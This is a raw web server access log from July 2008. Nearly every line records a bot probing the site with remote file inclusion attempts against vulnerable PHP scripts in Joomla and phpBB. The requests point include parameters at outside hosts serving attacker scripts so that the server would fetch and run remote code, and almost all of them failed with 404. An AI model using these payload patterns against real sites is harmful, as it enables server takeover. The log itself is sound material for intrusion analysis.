222.251.223.180 - - [06/Jul/2008:17:00:34 -0700] "GET /logs/access_071224.log/index.php?cont=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.251.223.180 - - [06/Jul/2008:17:00:35 -0700] "GET /index.php?cont=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.251.223.180 - - [06/Jul/2008:17:00:35 -0700] "GET /logs/index.php?cont=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
128.121.21.48 - - [06/Jul/2008:17:00:43 -0700] "GET /logs/access_080114.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://nhocmeo.info/MySQLDumper/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.108.67.216 - - [06/Jul/2008:17:00:49 -0700] "GET /logs/index.php?body=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.67.216 - - [06/Jul/2008:17:00:49 -0700] "GET /index.php?body=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.22.204.188 - - [06/Jul/2008:17:00:56 -0700] "GET /logs/index.php?cont=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
203.22.204.188 - - [06/Jul/2008:17:00:56 -0700] "GET /index.php?cont=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
203.22.204.188 - - [06/Jul/2008:17:00:57 -0700] "GET /logs/access_071224.log/index.php?cont=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:01:36 -0700] "GET /logs/access_071008.log/index.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:01:36 -0700] "GET /logs/index.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:01:36 -0700] "GET /index.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:01:41 -0700] "GET /logs/access_070813.log/index.php?p=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.135.183.134 - - [06/Jul/2008:17:01:45 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.summitcircle.com"
195.135.183.134 - - [06/Jul/2008:17:01:46 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:01:48 -0700] "GET /logs/access.log/home.php?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:01:48 -0700] "GET /home.php?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:01:49 -0700] "GET /logs/home.php?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:02:14 -0700] "GET /logs/access_071126.log/index.php?middle=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:02:14 -0700] "GET /logs/index.php?middle=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:02:14 -0700] "GET /index.php?middle=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
222.251.223.180 - - [06/Jul/2008:17:02:50 -0700] "GET /logs/access.log/index.php?pag=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
222.251.223.180 - - [06/Jul/2008:17:02:51 -0700] "GET /logs/index.php?pag=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
59.126.46.141 - - [06/Jul/2008:17:03:06 -0700] "GET //modules/My_eGallery/public/displayCategory.php?scanpath=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
59.126.46.141 - - [06/Jul/2008:17:03:15 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?scanpath=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
203.88.121.128 - - [06/Jul/2008:17:04:03 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
59.126.46.141 - - [06/Jul/2008:17:04:34 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
59.126.46.141 - - [06/Jul/2008:17:04:34 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
66.76.60.39 - - [06/Jul/2008:17:06:15 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
66.76.60.39 - - [06/Jul/2008:17:06:15 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
200.6.155.114 - - [06/Jul/2008:17:06:26 -0700] "GET /logs/index.php?body=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.6.155.114 - - [06/Jul/2008:17:06:26 -0700] "GET /index.php?body=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
203.88.121.128 - - [06/Jul/2008:17:06:53 -0700] "GET /logs/access.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
203.88.121.128 - - [06/Jul/2008:17:06:54 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
203.88.121.128 - - [06/Jul/2008:17:06:54 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.76.60.39 - - [06/Jul/2008:17:07:26 -0700] "GET /logs/access_070813.log/index.php?id=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
116.125.113.115 - - [06/Jul/2008:17:07:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "summitcircle.com"
116.125.113.115 - - [06/Jul/2008:17:07:43 -0700] "GET //skin/zero_vote/error.php?dir=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
222.251.223.180 - - [06/Jul/2008:17:10:18 -0700] "GET /logs/access_070813.log/index.php?do=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.67.216 - - [06/Jul/2008:17:11:00 -0700] "GET /logs/access_070813.log/index.php?id=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:11:55 -0700] "GET /logs/index.php3?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:11:56 -0700] "GET /index.php3?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:11:56 -0700] "GET /logs/scripts.log/index.php3?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.20.120.10 - - [06/Jul/2008:17:12:41 -0700] "GET /logs/access_070826.log//faqsupport/samplefaqsupport.php?path[docroot]=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.20.120.10 - - [06/Jul/2008:17:12:41 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.20.120.10 - - [06/Jul/2008:17:12:41 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:12:50 -0700] "GET /logs/access_080407.log/index.php?stranica=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:12:50 -0700] "GET /index.php?stranica=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:12:50 -0700] "GET /logs/index.php?stranica=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.20.120.10 - - [06/Jul/2008:17:12:54 -0700] "GET /logs/access_071022.log//faqsupport/samplefaqsupport.php?path[docroot]=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:12:59 -0700] "GET /logs/access_071112.log/index.php3?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.244.187.12 - - [06/Jul/2008:17:13:56 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.244.187.12 - - [06/Jul/2008:17:13:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.244.187.12 - - [06/Jul/2008:17:13:57 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.244.187.12 - - [06/Jul/2008:17:14:10 -0700] "GET /logs/access_071022.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.6.155.114 - - [06/Jul/2008:17:14:19 -0700] "GET /index.php?dir=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
69.93.48.162 - - [06/Jul/2008:17:14:20 -0700] "GET /voir.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [06/Jul/2008:17:14:20 -0700] "GET /voir.php?inc=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
203.22.204.188 - - [06/Jul/2008:17:14:30 -0700] "GET /index.php?cont=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
203.22.204.188 - - [06/Jul/2008:17:14:32 -0700] "GET /logs/index.php?cont=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
203.22.204.188 - - [06/Jul/2008:17:14:33 -0700] "GET /logs/access.log/index.php?cont=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
203.88.121.128 - - [06/Jul/2008:17:14:33 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
128.121.21.48 - - [06/Jul/2008:17:15:26 -0700] "GET /logs/access_080210.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://nhocmeo.info/MySQLDumper/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.76.60.39 - - [06/Jul/2008:17:15:45 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.76.60.39 - - [06/Jul/2008:17:15:45 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.76.60.39 - - [06/Jul/2008:17:15:45 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.244.187.12 - - [06/Jul/2008:17:16:13 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.244.187.12 - - [06/Jul/2008:17:16:13 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.76.60.39 - - [06/Jul/2008:17:16:16 -0700] "GET /logs/access_071008.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
80.82.215.11 - - [06/Jul/2008:17:17:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.82.215.11 - - [06/Jul/2008:17:17:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.76.60.39 - - [06/Jul/2008:17:18:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.93.48.162 - - [06/Jul/2008:17:18:58 -0700] "GET /logs/access_071112.log/voir.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [06/Jul/2008:17:18:58 -0700] "GET /logs/access_071112.log/voir.php?inc=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [06/Jul/2008:17:18:59 -0700] "GET /logs/voir.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [06/Jul/2008:17:18:59 -0700] "GET /logs/voir.php?inc=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:19:51 -0700] "GET /logs/access_071112.log/index.php3?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:19:51 -0700] "GET /index.php3?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:19:51 -0700] "GET /logs/index.php3?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
128.121.21.48 - - [06/Jul/2008:17:21:06 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://nhocmeo.info/MySQLDumper/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
200.6.155.114 - - [06/Jul/2008:17:21:08 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.6.155.114 - - [06/Jul/2008:17:21:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
212.71.37.136 - - [06/Jul/2008:17:21:54 -0700] "GET /logs/access_070806.log HTTP/1.1" 200 1493547 "http://search.yahoo.com/search;_ylt=A0oGkw18YHFIxmcBe0pXNyoA?p=74.222.10.90.phone%2Fexe.com&fr=ieas-dns-tb&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
201.212.0.39 - - [06/Jul/2008:17:22:57 -0700] "GET /logs/access_071029.log/index.php?dir=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
201.212.0.39 - - [06/Jul/2008:17:22:58 -0700] "GET /index.php?dir=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
201.212.0.39 - - [06/Jul/2008:17:23:04 -0700] "GET /logs/index.php?dir=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:23:30 -0700] "GET /logs/access_070924.log/index2.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:23:30 -0700] "GET /index2.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:23:30 -0700] "GET /logs/index2.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.85.96.130 - - [06/Jul/2008:17:23:36 -0700] "GET /logs/access_080114.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
70.85.96.130 - - [06/Jul/2008:17:23:36 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
70.85.96.130 - - [06/Jul/2008:17:23:36 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
201.6.118.215 - - [06/Jul/2008:17:24:25 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.6.118.215 - - [06/Jul/2008:17:24:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.6.118.215 - - [06/Jul/2008:17:24:25 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.84.182.98 - - [06/Jul/2008:17:24:27 -0700] "GET /logs/access.log/nav.php?pagina=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.84.182.98 - - [06/Jul/2008:17:24:27 -0700] "GET /logs/nav.php?pagina=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.84.182.98 - - [06/Jul/2008:17:24:27 -0700] "GET /nav.php?pagina=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
87.117.238.16 - - [06/Jul/2008:17:24:31 -0700] "GET /logs/access.log/nav.php?pagina=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
87.117.238.16 - - [06/Jul/2008:17:24:31 -0700] "GET /nav.php?pagina=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
87.117.238.16 - - [06/Jul/2008:17:24:31 -0700] "GET /logs/nav.php?pagina=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
201.6.118.215 - - [06/Jul/2008:17:24:43 -0700] "GET /logs/access_071008.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:25:56 -0700] "GET /logs/index2.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:25:56 -0700] "GET /logs/access_071231.log/index2.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.246.22.32 - - [06/Jul/2008:17:25:56 -0700] "GET /index2.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
70.85.96.130 - - [06/Jul/2008:17:25:59 -0700] "GET /logs/access_071111.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
58.229.117.42 - - [06/Jul/2008:17:26:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:26:12 -0700] "GET /logs/access.log/index.php?a=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:26:12 -0700] "GET /index.php?a=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:17:26:12 -0700] "GET /logs/index.php?a=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
200.20.120.10 - - [06/Jul/2008:17:26:37 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
222.251.223.180 - - [06/Jul/2008:17:28:01 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.75.152.96 - - [06/Jul/2008:17:28:23 -0700] "GET /logs/access_080107.log//com_expose&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.75.152.96 - - [06/Jul/2008:17:28:23 -0700] "GET /logs/access_080107.log//com_expose&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.75.152.96 - - [06/Jul/2008:17:28:23 -0700] "GET //com_expose&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.75.152.96 - - [06/Jul/2008:17:28:23 -0700] "GET //com_expose&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.75.152.96 - - [06/Jul/2008:17:28:24 -0700] "GET /logs//com_expose&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.75.152.96 - - [06/Jul/2008:17:28:24 -0700] "GET /logs//com_expose&Itemid=&mosConfig_absolute_path=http://www.deltaevents.be/images/sxs.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.6.155.114 - - [06/Jul/2008:17:28:31 -0700] "GET /logs/access_070820.log/index.php?id=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.6.155.114 - - [06/Jul/2008:17:28:31 -0700] "GET /index.php?id=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
